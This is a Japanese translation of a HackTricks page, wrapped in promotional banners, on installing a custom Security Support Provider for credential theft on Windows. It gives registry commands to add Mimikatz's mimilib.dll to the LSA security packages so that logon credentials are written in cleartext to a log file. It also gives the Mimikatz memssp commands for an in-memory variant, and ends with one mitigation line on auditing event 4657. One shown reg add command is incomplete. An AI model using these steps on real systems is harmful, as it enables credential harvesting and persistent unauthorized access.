5.2 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
-
ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。
カスタムSSP
ここでSSP(セキュリティサポートプロバイダ)とは何かを学びます。
自分自身のSSPを作成して、マシンへのアクセスに使用される資格情報をクリアテキストでキャプチャすることができます。
Mimilib
Mimikatzが提供するmimilib.dll
バイナリを使用できます。これにより、すべての資格情報がクリアテキストでファイルに記録されます。
dllをC:\Windows\System32\
にドロップします。
既存のLSAセキュリティパッケージのリストを取得します:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
セキュリティサポートプロバイダリスト(セキュリティパッケージ)にmimilib.dll
を追加します:
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
そして、再起動後、すべての資格情報はC:\Windows\System32\kiwissp.log
に平文で見つけることができます。
メモリ内
また、Mimikatzを使用して直接メモリにインジェクトすることもできます(注意:少し不安定で動作しない場合があります)。
privilege::debug
misc::memssp
これは再起動では生き残りません。
緩和策
イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
の作成/変更の監査
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterでフォローする🐦@carlospolopm。
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。